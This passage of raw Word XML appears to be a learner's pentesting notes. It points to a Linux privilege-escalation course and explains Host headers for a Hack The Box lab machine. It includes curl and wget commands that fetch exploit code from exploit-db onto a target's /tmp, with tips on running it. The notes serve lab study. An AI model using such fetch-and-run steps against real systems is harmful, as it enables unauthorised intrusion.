      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003319">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1120">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tib3rius Linux Priv esc course</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1326"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Video: SUID / SGID Executables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1326"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time: 4:45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to get an exploit into your VM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003320">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003321">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1587500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1121"/>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3322">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIP: On the target machine, move to /tmp or any other non-important directory since sometimes if you are in another directory, you might not have valid permissions to upload to that directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003323">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You see the EDB-ID. So just do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003324">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o exploit.py https://www.exploit-db.com/raw/EXPID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://www.exploit-db.com/raw/EXPID -O exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003326">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This saves exploit to a file named exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003327">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, you can click on the {} which gives you a URL to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.exploit-db.com/raw/51797</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then you can use the same command was before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003328">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003329">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LEARN HOW TO USE IT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 exploit.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 exploit.py --help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should tell you how to run it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the code and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+F</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "argument" or anything like that to see what arguments it wants</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Many exploits include a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function or comments explaining how to run them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003330">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003333">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8opbjai5itfz" w:id="451"/>
      <w:bookmarkEnd w:id="451"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003334">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003335">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I added "10.129.227.248 s3.thetoppers.htb" to my host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003336">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003337">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when I searched s3.thetoppers.htb, I got a different website than when I searched 10.129.227.248.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003338">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003339">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you visit a website using a hostname like s3.thetoppers.htb, your browser includes a Host header in the HTTP request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: s3.thetoppers.htb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you visit using the IP directly (e.g., http://10.129.227.248), the Host header will contain just the IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003340">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003342">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 10.129.227.248</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003343">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003344">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Host header tells the web server which website or virtual host to serve.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003345">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003346">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003347">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Should They Be the Same?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003348">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Not necessarily. The /etc/hosts entry only ensures that your system resolves s3.thetoppers.htb to 10.129.227.248. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server at 10.129.227.248 decides how to handle requests based on the Host header. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server is configured to serve different content for s3.thetoppers.htb and bare IP requests, the responses will differ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003349">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, the header (the thing you put in the URL) matters, even if the are "resolved" to the same thing according to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose of adding 10.129.227.248 s3.thetoppers.htb to /etc/hosts is to create a local hostname-to-IP mapping so that your system resolves the domain s3.thetoppers.htb to the IP address 10.129.227.248. This is particularly useful in situations where DNS (Domain Name System) is not available or configured for that domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
